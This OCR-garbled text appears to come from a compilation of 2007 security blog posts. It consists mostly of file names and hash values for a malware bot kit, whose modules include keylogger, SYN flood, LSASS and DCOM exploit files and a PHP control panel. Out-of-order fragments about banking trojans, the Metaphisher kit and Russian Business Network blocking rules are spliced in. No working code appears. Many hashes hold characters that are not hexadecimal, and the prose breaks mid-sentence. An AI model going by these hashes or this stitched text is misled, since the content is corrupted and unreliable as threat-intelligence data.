624ab1d6ccO5f0dbea9068eb6137feec 
cfg.h 
4153732154a0557el1f8b02fead2bdd75 
aliaslog.cpp 
831laeea77fa590999ea7cb21c084613d 
autostart.cpp 
€4865d3674e5402dbd98aad4e9241 2ef 
avirus.cpp 
d3a7e0771a691b3aa4653332e8f48773 
crc32.cpp 
eb17deaee053524f4cc29eab31d0bddd 
crypt.cpp 
a5898b8ff50ce3925f5b0d962ea6f3b3 
download.cpp 
27e3d600249fddb7c94ff86bf4fdff36 
driveinfo.cpp 
42e9e4b60b6902e4700979502f16b86a 
ehandler.cpp 
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ea5fc7bdfe539b5e6501df39a4059485 
fphost.cpp 
dae10ad7177360d203ab4149bc721c9b 
ident.cpp 
2ed058e643bf25d4a29b0efc93b8265c 
irc send.cpp 
45cc6b478059c28e039d32ebfedb25c8 
loaddlls.cpp 
a5e33dc3ca7e8b5d363aleabc40afd8c 
misc.cpp 7ec4770962e18a9d65aee4c68af454e2 
net.cpp 
51414aa8fe6f517dce740967fd217460 
netutils.cpp 
0d2b093e763597769bee0297c72d2d01 
nzm.cpp 
9e5ccfe359dad60960e0d68d05792f11 
peer2peer.cpp 
26652dbebf0c798b7700a5316b96c634 
processes.cpp 
d82131dfa0fb50405fecfl7a56653e4a 
random.cpp 
bacda003f928faad42285546c6bbdcf6 
rndnick.cpp 
a2f56fdc8d7c69c9d9d036524760d8b7 
session.cpp 
d233bcadlbdb8c3fff3fdbafea714e89 
shellcode.cpp 
02f4a5601laec9d5fla5f2ddd8879ce5f 
sysinfo.cpp 
bOdfb00fécf3be0d7e20f349eae7745a 
threads.cpp 
b0869845e3082465a3ae2ce0e1303b2e 
wildcard.cpp 
5f95acc7fa856262bd5a9bdd05b86c8a 
ddos.cpp 2b42f946f35020a522445ceac03f5916 
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ttp://news.bbc.co.uk/1/hi/technology/7067962.stm 


8. 
9. http: //ddanchev . blogspot .com/2007/09/spammers-and-phishers-breaking-captchas.htm 


10. http://ddanchev. blogspot .com/2007/10/diy-captcha-breaking- service. htm 


3.11.2 Metaphisher Malware Kit Spotted in the Wild (2007-11-02 15:46) 
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Such [1]crimeware botnet C &Cs entirely encompassing of banker trojans infected PCs can 
[2]depress every financial institution’s PR department who often talk more about [3]SSL as the 
cornerstone of secure E-banking [4]than they should, next to forwarding the responsibility for 
fraud prevention to the [5]SSL secured customers under the umbrella of a signed e-banking 
contract. [6]No Anti Virus Software, no E-banking for You mindset is greatly desired to at 
least slow down the emergence of such banking malware botnets. When you come across 
something like this, you get the cyber shivers, as it’s done for pure massive banking frauds 
in a typical malicious economies of scale fashion. Once success is anticipated in the form of 
infecting as many PCs as possible, methods to steamline efficiency start emerging. 


icmpflood.cpp 
c0a58537d3b37b433f9cla75dbfddabb 
pingudp.cpp 
bb40f66ebfdebla73acd6b4dda87bbcd 
supersyn.cpp 
a7664145a202dee4c9c6b98f8f53ee73 
synflood.cpp 
99147203945509439f917b663a3b0528 
tcpflood.cpp 
c19462abed0023521f07abf908adfOFf9 
tcpflood2.cpp 
al866488bf0b2de298b4b75cea74378F 
clsass.cpp 
b5481f45acac847d6cc4c636e71079de 
dcass.cpp 
21be53bdef645af48fbb224ba99a4a89 


dcom.cpp ela6blf7dbel7ec9f0c63c5033e22e45 


Isass.cpp 
8da03139779d188448ba5323e051ef5d 
Isassllsass.cpp 
5a0771481b9a90ac6a4bd26fcee91f3d 
mssql.cpp 
f82b32936c51b616fddal23645e31lacf 
mssqllsass.cpp 
c07cac3d7f400da3c0854a5f79806b69 
realcast.cpp 
70f3f87ef679829e33f2ae98b63bbd9e 


wins.cpp 42a267c014db4a1fb95240acde5a9887 


wkssvc.cpp 
2f837143d6d22fac428a8689c727436f 
capture.cpp 
6e06ebc6f2215300a87088ae182b9ced 
cdkeys.cpp 
1752a34e6d7d986bb918f83ceca23035 
dcc.cpp 
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f5d3ef06222bef48e244c797a17c27c9 
findfile.cpp 
79f2afl49eeab89a4f527bf664fb990d 
findpass.cpp 
133c8405971cf9a94613d6efa68f3a48 
httpd.cpp 
6d2969ed87ca82a39c8c45cc795b99e7 
keylogger.cpp 
603598b63bed71e4b7ef6ébba9f0203b2 
psniff.cpp 
e914f46c0330fa749e8db8d85a61058e 
redirect.cpp 
eOac9cef5ea9f61f41cc3726c3699248 
remotecmd.cpp 
9c07c659b40eabe9f067838d80c40946 
secure.cpp 
adfa79c6426febc878498f0381c5f0fO 
socks4.cpp 
10af0b820c2e09f5c384c786calffef9 
visit.cpp 
60f03c5533af3a0d513986fb389a9e51 
advscan.cpp 
85437c655b20ef9885e4e5529405816b 
scan.cpp 9494dfd268fff82f7c6acc6d66295c96 
ftpd.cpp 328a73baa604alae869990a75ddf662e 
tftpd.cpp 
160e7f4f0642dbc60e679c11bbc07784 
commands.html 
4156b6604de516b4a7a4b3d84d798b91 
commands.txt 
b98473721ccf3cf80e83f3874678f4ab 
nzm.jpg 
716d5fcb2cba5a117dc3579e6a57216e 
advscan.h 
69c94ef2c99020746c1e4f3871ef013d 
11484 


aliaslog.h 
5190cd5c6b9af768d2f12ec53a33539e 
autostart.h 
a346ce96fba3d146d6db423516453504 


avirus.h 5f7878ec5edf81f7c7374f2c530dff22 


capture.h 
c9b9a98F71e58aa5c95fa7e22def6029 


cdkeys.h eObf3b6a764f23ccf8d8b32a05985038 
clsass.h 8e0336973a1f5842c2d57d4e615e208f 


crc32.h 
8ccb9e857c9cb41f21eb3c493a71413d 
crypt.h 
€6a525ef1160950005b397926308c750 
dcass.h 
4b1d02dde13f7f25e6b252f9d5fe478e 
dcc.h 
59993ef594caf2cf41a2a49195c78eab 
dcom.h 
9d0c31dla4aacb69f45f9de51617e50b 
ddos.h 
755db82f748d3713e5f5c1756ad930d9 
defines.h 
d1929db13be566d85cf137fb1d54b669 
download.h 
87b2f888818aab05cf88fa4c72b94827 
driveinfo.h 
592244a945306749409db5f7e8236ebb 
ehandler.h 
7e€240b2a256fd7175288bfcb9b3f0afb 
externs.h 
961a933496d0dc6fb51d90a335df84ba 
findfile.h 
e7964ada0bal9576c35caa348a9fled0 
findpass.h 

d6f12ac593da98e6 labf82cfb9d7b853 
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fphost.h 4e18e2c0e05b3902660684c7d6f52ad8 
ftpd.h 
bee3cc2dd90b09d6002faddd7871d5e2 
ftppot.h 6f23f8b4c2b1684e2028e4f0e2ef033e 
functions.h 
1557ce234058d139a95c1d4675509e85 
globals.h 
23775cbc6968cac7f94add3646c4ad04 
httpd.h 
46539c7bcd1cb4d91fl4ec426aea7459 
icmpflood.h 
d03b9e0al156caed926e0c6509be75fe2 
ident.h 
b12d04376ddba020bb614b28f643d722 
includes.h 
4ee8aefc93f8611balddc5c87b035ab7 
irc _send.h 
94345b8777c46d3f67dfc088b5206190 
keylogger.h 
998e7a3a5b99ab6f893fdd49ea336ffO 
loaddlls.h 
33a51d5702427f1035eef60ccbca289f 
Isass.h 
da704f3106e215af2e1b40eb/7ffle9ef 
Isassllsass.h 
96c25be3a04398fb09a76ffd7c21c03b 
misc.h 
8e2b1dfl0fb00d1b0ac04d0b3f2f4943 
mssql.h 
dad3ee87222e56569de606559c6e64de 
mssqllsass.h 
b8e8568851fbe532291b46211cdd930e 
net.h 
e7d2cbe50a915c90c44fbb05c12ddeec 
netutils.h 
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045df2759c4c65dd18ee2fda4f2674d1 

nicklist.h 
€267b6bc88d23669d999c9F795c79497 

nzm.h 

92ff8585cf0a5e6dbb6097b30002dd4c 
passwd.h 21ba8469c127a4cc3f96fa939bc5fa5e 
peer2peer.h 
98a87d72f519eb3afle8288f76d3e44f 
pingudp.h 
5f919f9a14b8b68b9640c79d16b259d6 
processes.h 
95283f0340970a60121daa28ce4e5c86 

psniff.h a83f21a522599efa0206cObf5eceebd9 
random.h bfc43fc76fb94a2bee83e6782a3albad 
realcast.h 
d7al14d60ffeab5efllde39ba64cce2e4 
redirect.h 
91eb59e1991fd1251e389b9942f1a381 
remotecmd.h 
7f6d9972b1e54786539c1df72205be44 
rndnick.h 
96313d83a017a0e87b9dc6664540a3ad 

scan.h 

4d5a41fa21277d1948c4c508c16487e1 
secure.h 8ca61057edab3e221f0981a85e31bebd 
session.h 
2e24eb8c867c37c2e4a083f41179a668 
shares.h d3a002008bd6e81af770acceb9534e42 
shellcode.h 
4ee1152c4ded683eb147c642dd3a044a 
socks4.h 25d729e47f7d550a16c46813c3c35f11 
supersyn.h 
c16fd14001ae1688a2578dca555151f0 
synflood.h 
268bb714d89832a5948873dfdba0655f 
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sysinfo.h 
396a06be63c7eb62b1c04fb9Fffd0667 
tcpflood.h 
c€11f092429b504a9dc56af5e05318d6b 
tcpflood2.h 
00271f68380e76fd220992702fc0a48e 
tcpip.h 
bf069e59cc4841e231a2ac1815c86044 
tftpd.h 
08a46fc3eleea39ac39cfab482287039 
threads.h 
5c1a437b21e6leech8e786137456009c 
visit. 
b15ed3d6348b577ce5df3bad37721aff 
wildcard.h 
c141f0f78a8e100094737a65a86f8c6b 
wins.h 
6def08395cad95ac3716b2ed5b2dac61 
wkssvc.h 0924ac6712d68a279b367a198eb25a4a 
builder.exe 
17389fb1da10f974a7ae8a44161a38eb 
cadt.dll 7adb52be768b7alcba41lefd9d2d5e433 
crypt.exe 
c49277bcdb291c3638efcd29607a44f7 
readme.txt 
784e8c9e88cb4e3e8eCc2062e6358ab98 
admin.php 
1a4d759ed1a11845d570ebded84b87eb 
check.php 
dd54d0e20bce045c12df1fd6f5b17f7c 
common.php 
f67447a4f7e80c8b8fce0d831b7c3f38 
config.php 
5e430abe329cc7a98a43e527aaee3ba5 
db.sql 
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d21890f1b9aclaa5e6800ed2284445af 
dloader.php 
75ed7bd42956a994267bbf2f0387cdfc 
GeolP.dat 
8c12799be40e2aa35cf812890d955ca3 
GeoLiteCity.dat 
2b222f9d18a5760cb492822667159b27 
get.php 
5a8d512499713704d2781a5297c77e54 
getsocks.php 
b8c8b64c29122bc0761e7e682elde4cc 
index.php 
c2bb0b7950b68e963f5724025c8d6d48 


info.php e435b9e074d3352f80f0f765a9794085 


MySQL.php 
148f41d85b6b8dcbfa2905f4286c47 6f 


stat.php 625fc2456bbf601b25d5114fd9ead804 


style.css 
foalfdf089a621bba8b21ae229707c43 
upd.php 
481b7c3f3f0ea8874d98ac1f6a65456a 
00.gif 
O5b6bc9laf6b168cdbecafe5c2397a/7f 
ad.gif 
b6b1e9619ed7289fba573e8d889d3819 
ae.gif 
b42e6f37ba2e059876e9cad6c8afbd98 
af.gif 
ccaf2f8cd19e558d2cb925e37b120f20 
ag.gif 
f60877160a45fe086b5943d487144b23 
ai.gif 
e9f155a292785d401d472c25a2735f39 
al.gif 
2379c017b4858d90f900b3564a88b72e 
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am.gif 
6a2e3d4ac7139f1665ec85daf905c4fb 
an.gif 
3felba098d2bd5f85c996ea0a5d7dd5a 
ao.gif 
3a30af9a98cf20e6619eeE234e8c7f929 
aq. gif 
23507525ab4e7d1023a3a6940790d9c6 
ar.gif 
2940a84a15b26e5ee37fa29a89947228 
as. gif 
e56e28dec792c71b32cb7299ebd83751 
at. gif 
cadc74036384cda59ee91d99bdcfdd69 
au. gif 
b91b6739c8107e29680568ef8ff952f9 
aw. gif 
8e91812abcd372b3a32e7c16c15dd8ed 
az. gif 
64c82a7cafccd37a526f7745b915b8aa 
ba.gif 
1c8a23d4d9ed0f8decf5eea261e631b5 
bb. gif 
ae7aadd035a40e5026a777e2ecdbd5f5 
bd.gif 
5349673c83420f65faac21f9ee14a7d2 
be.gif 
€2697c0d2f33f4c8ca85dac762734cfc 
bf. gif 
d10e907a9fb8487940f6c5d350dde6ae 
bg. gif 

f6e51fba28e2744b67 8ffd752d75f945 
bh. gif 
b8aeb3f5a24a277ea6c826cd4113e2ee 
bi.gif 
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fe5f4500cf4baef1d65a424e8d5689bc 


bj.gif 
97af4afce5fd166559201493f6848c47 
bm.gif 
06045f155dd3b1d22cd28b86e57de479 
bn.gif 
43948655b170b8e063f023620d97c76b 
bo.gif 
9c4ef78c1b8051c0038227e04705c871 
br.gif 
667c1c786e5365ealff2c51lbaed8e6a7 
bs.gif 
1lbc0alb6cf00a50bb9bf3588d84b321¢c 
bt.gif 

bv. gif 
e023614ca4df2ed1be0dacf9f736826a 
bw.gif 
d4232256a8374cff569021c5351301be 
by. gif 
23f79b7553f5cdcc90f3bcelf7feld0c 
bz.gif 
2ab46e28a4d3084d7620e0aaecf4c235 
ca.gif 
c1c24f48ac653bf3f07423fd1i2ecd11f 
cd.gif 
b74241ecd992051a41c456f3e6ec2ad3 
cf.gif 
fdd15d7a37c8e885b731d6f7c8c67dc6 
cg.gif 
62a3129d39d66d648580fbeef1lfce60f 
ch.gif 
a9aa4db50f1d232d494610110455e98d 
ci.gif 


0f8d3618f8a62d914f0f792a83c2c687 
ck.gif 
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edafceaafl0f5f387523fd27915628e7 


cl.gif 

65341 ffddf87323b55fdff8bb115bc75 
cm.gif 
1bb0670559a2676fd42dfdef3a7b1b/7f 
cn.gif 
12a79273092a0a93adbfe9b685634e5f 
co.gif 
966dc7ed9306794734a2e61438f89744 
cr.gif 
c5fa3319590501d12afd4e16b4ed81b0 
cu.gif 
a40b55eeca54fe5605f06d194b179d3a 
cv.gif 
d26c9fc27103d723586ba616057460dd 
cy.gif 
d8dd4cfcd2570984219c9826d417ee9a 
cz. gif 
3c706c7f9d3bb30ae2df290c8a9be3e7 
de. gif 
1f31389417402bf187e3276579adcfcl 
dj.gif 
c7bf7379f87e9aac8c045ed3bf58da23 
dk.gif 
8337faebf55a6e5b297aff95517147a9 
dm.gif 
6f33e31ac969168d9431cc865001a21a 
do.gif 
d50d679037a133f49533abd436aac790 
dz.gif 
fd8b3e3a882012c111c387b4a24c201b 
ec. gif 
6d213134a8af6250fe5b269d16b52967 
ee. gif 


3e3f7d30e9e58b2c98f6f5d7f7be164c 
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Mozilla Firefox 
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As I’ve [7]once pointed out, one-time-passwords in everything and [8]two-factor authentica- 
tion is marketable, yet it’s not the authentication process malware authors excel at breaking 
as they don’t even have to. They "form grab" and "session grab" efficiently in a [9]Nuclear 
Grabber style, the 1.0 version of the currently emerging e-banking malware. 


Another related post on [10]FortifySoftware’s blog wisely debunks the notion that online 
banking is safer than physical banking as an executive tried to convince them. 


1. http://www.rsaconference.com/uploadedFiles/RSA365/Security_Topics/Hackers_and_Threats/White_Papers/RSA/CR 
IME_WP_0607. pdf 
ttp://www.symantec.com/avcenter/reference/phishing.in.the.middle.of.the. stream. pdf 


ttp://ddanchev. blogspot .com/2007/05/client-application-for-secure-e-banking. html 


http: //ddanchev. blogspot .com/2007/02/xss-vulnerabilities-in-e-banking-sites.htm 


http: //www.ebankingsecurity.com/ebanking_bad_for_your_bank_balance. pdf 


http: //ddanchev. blogspot .com/2006/05/no-anti-virus-software-no- e-banking .htm 
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eg.gif 
9600de10fc4779b7873d463e4a5188e9 
er.gif 
238dde43e7077fade86597999e6046c2 
es. gif 
4fc4c91dbb8012db776af9b476c4elcd 
et.gif 
737dc12da78a0b27b999544a41b8c954 
eu.gif 
6a257a89ee638d66865664ee968fT7 2c 
fi.gif 
Oaae04dbd30720f6bd155ce7840910e3 
fj.gif 
a825cdf6cdc75877a2748201e0d14874 
fk.gif 
a2d83821d143ce2c35e48c9e9ef021e4 
fm.gif 
5cbe429c604ede636f93f9e3e65d2d3e 
fo.gif 
adc678b55e16ee1c8e4363e1fd764086 
fr.gif 
7f66797472eb9360e0bd22bfcfb9delf 
ga.gif 
96de40e3362ec03980171a6b347755e4 
gb.gif 
93cb87bcf85c3b2756f6b296494cbc37 
gd.gif 
83810a8a9a36dfla42a7e2df644b07e2 
ge.gif 
ac87f86413d9e214be3de0d3820cfla7 
gh.gif 
6e506c781480alef5eb80a5f415c300a 
gi.gif 
26f676e5676155claal278e3c0e2ede6 
gl.gif 
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220ba9d5444b958512cf8c14e6f3664d 
gm.gif 
6b71edef56d177266bd076cda58def7e 
gn.gif 
c07acd5a538c11ec4933de155b5341a2 
gp.gif 
d12f295c5396a57c3ca27de5e46b1f94 
gq.gif 
303063fca23a70f425dc923ce3f34b30 
gr.gif 
cee23846c8603623882ed5134406806c 
gt.gif 
9b5e92154496a88f1cal064845497 7af 
gu. gif 
d8ee6ee605a30ddadafb179000fle62b 
gw. gif 
7008cdb584b4983fbf7458de392f3b82 
gy.gif 
e0745abf42d852da0588adeab822c002 
hk.gif 
83301f5dfebf29cd5aca49a6272240c8 
hr.gif 
39cac2f2e2e6a9f41f89026442287682 
ht. gif 
99b88b35b9310162500f187da64b579e 
hu. gif 
3212a65eba5018fdee554234c45fb5ff 
id.gif 
a3fe271b1dec3d96fd3cebce6591c840 
ie.gif 
d0101b97df3644ac8ef40780ca5cdf8b 
il.gif 
ce092caal539ae185ae407fbc543cd5c 
in.gif 
3f042¢528c4bf957777be35f6b18c691 
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iq.gif 
43a114c7298e15308378fe959f94f3ed 
ir.gif 
2a8da57126b658e256ce5b93c6949b83 
is.gif 
142622e0042666bac6eebeaf8c8e53ec 
it. gif 
72b0c360b078e4b7d58840c12ec89525 
jm.gif 
b71f782c24a3caf90d61119fc2a03ade 
jo.gif 
9ee5f4d1e42146b658b84b3ddd99119c 
jp.gif 
531e4982260e50c173872d32553b9d91 
ke.gif 
27481845c6081487f2b67fc7754f8944 
kg.gif 
202b1977ecf77a413b7565ada8el26fa 
kh. gif 
10324ab7e6a04171269da2092333d4e6 
ki.gif 
3367e0e37cf04ef726ed4f31cbb255b1 
kp.gif 
83172c1241cad924321c27151533316d 
kr.gif 
27b12726647e7e783763ad85fbf407c5 
ky. gif 
cc6c838c50ec7d1lec09f4c59537f2c05 
kz.gif 
c9a29f216dc2aeb3f73f7b50b7 7a4b4f 
lb.gif 
6b7a372934ffc86493ae4daadaa67501 
Ic.gif 

Ik.gif 
d9eee6b3fcc3d011b684d422ccfd6e38 
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It.gif 
84d76flfbaa49b7d81a10119fa550081 


lu.gif 
€333c2b38ad7dbec56be0ea95460al2c 
lv.gif 
514de74dc630c59838c4406dbc6f3815 
ly.gif 
ad9d25d33cfa64c074d4afce1944a7a3 
ma.gif 
a64b6726eecb6c97cdc7d9e99Ff97F58b 
mc.gif 
b078930a4bc2282c3669e0af905513dd 
md.gif 
d10c62b50e2d991f4229d01613bf64ba 
mg.gif 
1fd3270525bef3c2209e0a3bcfcef238 
mn.gif 
75afb51335f3a965ff7f1b4435c6828c 
mo.gif 
8b4d9ee4b065403e3efa837ab3fc3d79 
mp.gif 
f7536c02354a2aa29ad117a0e317046b 
ms. gif 
639022bebfa4985f543eb4c7c55cb4c9 
mt.gif 
b630e0faea7c9db87aeef9cae912d573 
mx.gif 
d3d43f8b958739b00582aa117b7b0d5f 
my. gif 
809e20fabeadfa4fédfaf629bfe32786 
mz.gif 
169b88a2d2e2b61074725cafcdb02137 
na.gif 
7879034a66005c6362f2dd6e76006903 
nc. gif 
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7f66797472eb9360e0bd22bfcfb9delf 
nf.gif 
76521b2845914c88e6ae0d70623d1fdd 
nl.gif 
96199acdb50773fe45dfdbc31078ea4c 
no.gif 
d98132d9186daf717fea60b515391dbb 
np.gif 
563b2a18cc772e8152588f1593e62296 
nr.gif 
43990e2c126fd5fab63ebff4aeb7abe9 
nz.gif 
3156460b6b5711d6eed7f7d8cc2ab5a7 
om.gif 
82a30a1754878742cc4f2d53a321bb18 
pa.gif 

2cb5e6357313398ff7 769acdc246d5a5 
pe.gif 
5c359dd05ae0be539b2d428c767269a3 
pf.gif 
fod8fc23d9eba2d1e25bd045bbe460a0 
ph.gif 
cec4d7560e2d08926359d2e87 7f3a76c 
pk. gif 
5cb1ff3e37207a760e2ecf45a5bb81d7 
pl.gif 
a929046f3f0c7781989a284371a7f43b 
pm.gif 
82147e98807c03773c0b68356172814d 
pr.gif 
b4c3c92d6f14d845e5bd6ef808992e75 
pt.gif 
ae548aa692ef71a331afe943026e111d 
py. gif 
479edce4532bd36f766bd29a346ee0c2 
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qa.gif 
6ad5b83645bf557fe570894f453f432a 


ro.gif 
ac04fb14afaae3bc4449a5401c3517e0 
ru.gif 
daa2a635125539998a491f04ce53dc60 
sa.gif 
bbd932aea9265abf5815b74dd9446de4 
sb. gif 
c41690739c4f92af9e065e81690a2356 
sd.gif 
aef2c6903b36e52b667bb0baa52604fc 
se. gif 
63ff75c06900689a5d43ab931bc82662 
sg.gif 
d89f586fb81c9a9cf9cdf95013F73908 
si.gif 
4f311a4b0a39db339be74a2f354d3799 
sk.gif 
01d603424483cf66ca867ba0flc9fec4 
SI.gif 
a8alca018798069590c0f8cb5796fc65 
so. gif 
5d8348e7a2fal302ff6a4a3fod2bfea6 
sr.gif 
cb7f3cc497f4067d09a0d61070c937ff 
sy.gif 
73380e84dc753e6cfd5b3d19219024d3 
tc. gif 
5d456951dcf4eb341117c87857a20848 
tg.gif 
6aa920611047a1bc48d722a896ae9466 
th. gif 
b525712cc1014c12071aa555b29d9654 
tn.gif 
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f7d1ccddc14b1b2754f19c5eb2d51a56 
to.gif 
lee074e0dbbb595647270dbced8a8743 
tr.gif 
23c0420906ac063753138c20bacd3ela 
tt.gif 
87decec956e1fc484b1a8b1716326b25 
tv. gif 
67e92c1c2cd1222fd607c9f91435883e 
tw.gif 
cf5c19a25cb1dd17f9d47b362d98e0a4 
tz.gif 
ef039d9935ecda27125f0fd39212ad44 
ua.gif 
1cc325bedc5df0920efedda54a184fdc 
ug.gif 
174636bd284c8d7f06638767bb84b6fd 
us. gif 
a5a63b0486b82f067e8cfcbf254a989b 
uy. gif 
275a0eccdca2720e84afa23054b5d371 
va.gif 
4fccba188125599f6448f8e0b71d0677 
ve.gif 
f1082562cd7ee5776e6e732cc7220889 
vg.gif 
5f89b155213d1c29181d06da33a974f8 
vi.gif 
b30d88bf20ffc5c75a254ab25b4c562c 
vn.gif 
5bf8dfaf74506f3d89aa4ab6fd9c4e211 
wf.gif 
ead7d3ac3881242575c0d251d7ad89e4 
ws.gif 
a027ff7cdd02b873d271f8d5lab89ae8s 
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ye.gif 
ee7fb77f702f0182de807f188138a152 
yu. gif 
6a7e5foc9e3ac06b720eea3387477771 
za.gif 
37d219e52bce3b94891821896c71699a 
zw. gif 
8d31cf8ee73d6c4e8fdd3c8382d01549 
Config _File.class.php 
5174f1b7a7632fd71d8f42a619d2bac2 
debug.tpl 
861630bd981a49c455633557e7976bf3 
index.html 

Smarty.class.php 
ca3eeec746c783c60dc2836d79122485 
Smartyk _Compiler.class.php 
772596c3f725181208f05470f33344e3 
Smarty _Compiler.class.php 
772596c3f725181208f05470f33344e3 
core.assemble plugin _filepath.php 
€98832bd718c94629c732b5d4c2980cb 
core.assign smarty _interface.php 
4c2dd142c1c59e101b2f60cfc7a7cdc2 
core.create dir structure.php 
f23d6ee40190b0067a76cba3982f9956 
core.display debug _console.php 
297b9baf349e7f32e8e815612e823e3c 
core.get include path.php 
ba78ea6d4112d4325b00e4b8101497c6 
core.get _microtime.php 
72eb40e8367f7 7f0bd251le15a5bd4f5f 
core.get php _resource.php 
e0fccd538d6f0ed8915d39cc2f9dd860 
core.is secure.php 
cf3d690ed4f5abfdf640912a2d7e6dae 
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core.is trusted.php 
c72a312401fac0839b485b4678d0d9a3 
core.load _plugins.php 
bfecc9c6fc53c9b4065e95e9a1646fd8 
core.load resource _plugin.php 
08d531fb688eed7253b316b11436e512 
core.process cached inserts.php 
0a4252d9ff2a63d1f82642bc563ebd5a 
core.process compiled _include.php 
6da8abe9ab2050618fd6e344fbc8059b 
core.read cache _file.php 
e7de28f374768f8b319687a34e226c80 
core.rmdir.php 
08209df8f3113b0d8322bcac3b5e055b 
core.rm _auto.php 
8834d9e9a8aa8473244d74096638b5c2 
core.run _insert handler.php 
f6452eb1f0f65cf3b07634228ea4c938 
core.smarty include _php.php 
0d87e492eb18ec8b4fa492f2ac34c163 
core.write cache _file.php 
6e0ca7e246ee7abfea7e2e6e4381332b 
core.write compiled _include.php 
482acaeb2a8c07clee00d9713dc460c0 
core.write compiled resource.php 
caa79e832d4587991606dd9a0988c852 
core.write _file.php 
77045cbf9677c5bc165b668a0f039005 
block.textformat.php 
b5c3502f7d897c806647f99e9860673d 
compiler.assign.php 
d3f82c3bd9a7c429f6b9956cd81d5d8a 
function.assign debug _info.php 
066f6f9cf79bd6d06d6adde83df25ee2 
function.config load.php 
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balb8beec90d1df50da658183c282546 
function.counter.php 
8f2b87669f2b32b217538892a2ca87ad 
function.cycle.php 
db7b2e51bd5e26f93032929dcb2d531b 
function.debug.php 
4963d564da17a2578fc5f56d9c53e7bc 
function.eval.php 
aa01882c7c32a719e395dced4f44f5b3 
function.fetch.php 
eacc3df7ab736e4f997b5bffb3ad8209 
function.html _checkboxes.php 
a05460918e36fd9ef66d955754868a3e 
function.html _image.php 
leba4ad4e01a5c0761a6533f3faf6a53 
function.html _options.php 
4f571f2ddble8ledc5d8bf3d2baa2b2b 
function.html _radios.php 
6a00315efe8f8202823ade3bf3e6e513 
function.html select _date.php 
37f5d5265bb3395a22cfoca47daa7f4c 
function.html select _time.php 
09653ddf2012400e9ad48be54423b7fc 
function.html _table.php 
da9f72eaf114dbcf0f416683b4bae5b1 
function.mailto.php 
f7673634ee0ed6147781810506464319 
function.math.php 
f7a46fobe8541e8506954dbe18d24198 
function.popup.php 
b4636e3a203493528a4b27807dleaa0f 
function.popup _init.php 
4f6abd1138e1a383d4f67f73693ba206 
modifier.capitalize.php 
59cee809f2cb4c5ebd8e5af24db7b4ce 
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7. http://ddanchev. blogspot . com/2007/05/def eat ing-virtual-keyboards .htm 


8. http: //ddanchev.blogspot .com/2007/08/paypals-security-key .htm 
9. http: //ddanchev.blogspot .com/2006/11/nuclear-grabber-toolkit.htm 


10. http://extra.fortifysoftware.com/blog/2007/10/has_online_banking become_safe_1.htm 


3.11.3. Detecting and Blocking the Russian Business Network (2007-11-03 20:32) 
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Rbnexploit.blogspot.com 


Bleeding Edge Threats [1]recently announced the release of [2]some very handy [3]RBN 
blocking/detecting rulesets : 


"Call these hosts what you like, we see a large amount of hostile activity from these 
nets, and get little to no abuse response for takedown, Do what you will with this information." 


Remember [4]RBN’s fake anti virus and anti spyware software? The [5]list is getting big- 
ger with another 20 additions again hosted on RBN IPs exposed by the RBNExploit blog. 


Meanwhile you may be also be interested in [6]how does an abuse request get handled 
at the RBN? Deceptively of course. Each and every domain or IP that has been somehow 
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modifier.cat.php 
9dbc6c2d6d78165d9d0ffae481509b6a 
modifier.count _characters.php 
b8e36f3c6070c42ecf9d885b6c7fOfaf 
modifier.count _paragraphs.php 
193e9f42f2c9d2aele3f5fd436bd191le 
modifier.count _sentences.php 
69c3de3fb2f3354af5198d6024337f07 
modifier.count _words.php 
€1092f458e4567355ec33e0d9338f296 
modifier.date format.php 
4ef742106d307c87e23ef441c6065fe4 
modifier.debug _print _var.php 
5b84f680c96f0a7c2af4dbe8b0468c15 
modifier.default.php 
51777576d60237138dff52c53951a46f 
modifier.escape.php 
d952df156a940f55d82654ced5ca9336 
modifier.indent.php 
f¢37415d78c32682c6a26d9d7calea2d 
modifier.lower.php 
22dc5ae8fa51b18f1ba4c11916d5a844 
modifier.nl2br.php 
1d16b98e8ec34aac69f0827fab1dc999 
modifier.regex _replace.php 
2d058f4f8c4951352bd4e6dflac6ce73 
modifier.replace.php 
1a3c3d47ddal18c3f474c246096c7e2ed 
modifier.spacify.php 
70a781b9113dfa993839f98716e0e900 
modifier.string _format.php 
4daa28ce2ea1608a44063192416ddfla 
modifier.strip.php 
b1281f77297db8cle50bc1fd883ebd78 
modifier.strip tags.php 
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943de33919643644e805424e84f444d9 
modifier.truncate.php 
2b3bc9e0d9529df2c6b92d7569042a84 
modifier.upper.php 
a134bcc753a1118e509b1497b4842a6c 
modifier.wordwrap.php 
4245b017b0dc42c7d64a56e1130f1099 
outputfilter.trimwhitespace.php 
d450a6b8021bd85d8a01dda02e666dc3 
shared.escape special chars.php 
baddddclea6c4fefe6734747357b3b33 
shared.make _timestamp.php 
db96d0500436de433befc9ad9e82d96F 
GeolP.dat 
fa685d37c5702689745d44f6bc89bd07 
GeolP.php 
aca2249c34addd9a4c689b45c27019d8 
DMA.php 
c4cc9299aba5f9479ade0c7e96bal 8f6 
Location.php 
67180cfa6a13c855e6fd80508c3791f6 
admin.tpl 
5ccfflal776fd25fda49ab0a6fd87146 

auth.tpl f1258ea7f390706592f1475ba80d14c8 
dloader.tpl 
4b7de855626daeaf544fcd47c8ecc221 
form.tp!| 0ba6724388d8bc53f7d327ebeccdcdcc 
index.html 

index.tpl 
70f765a1385aabfa39c85d166e739193 
info.tpl d7196a61c3fb4bf826c9d89a967fd18d 
main.tp] da916430f9c593d26e3cba58d0bf9b31 
upd.tpl 
0222fe96393658ac3897e57241d8575d 
index.html 
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pwnBoT.dsp 
2b251f5dc23a2ae60e2cd14d8214882f 
pwnBoT.dsw 
2a6b95470f3eeaa5fb573aab1b478d36 
pwnBoT.ncb 
be55c19ffd3e57c359fd99bab10573ef 
pwnBoT.opt 
4325b8241219211f91ef214a83dff766 
Coming Updates.txt 
da17b919990e237ca5b358bad3a92c9d 
Command List.txt 
f17d13b8e2636cc29e5edff7b85bbec3 
IMPORTANT README NOW.txt 
afa7efa4257e3525f6c03722d9e0748b 
advscan.cpp 
e19ca7b9cee540a03c1a0d980d5f457d 
advscan.h 
439a84c391c2aeeedc8b3c136c778690 
aliaslog.cpp 
d06e0a90ead5305cb2cbf8002ba55ffO 
aliaslog.h 
80808c977e8d2534fab65c79f904e6a3 
autostart.cpp 
6c9c9ba716c2f79a10584cfbc70713b2 
autostart.h 
5095d41452b5b046066ed3fcd68825a8 
capture.cpp 
51157d8d01561c505c14c5e3c0d235ac 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
baf528c41399029cf6e81lef26ed80147 
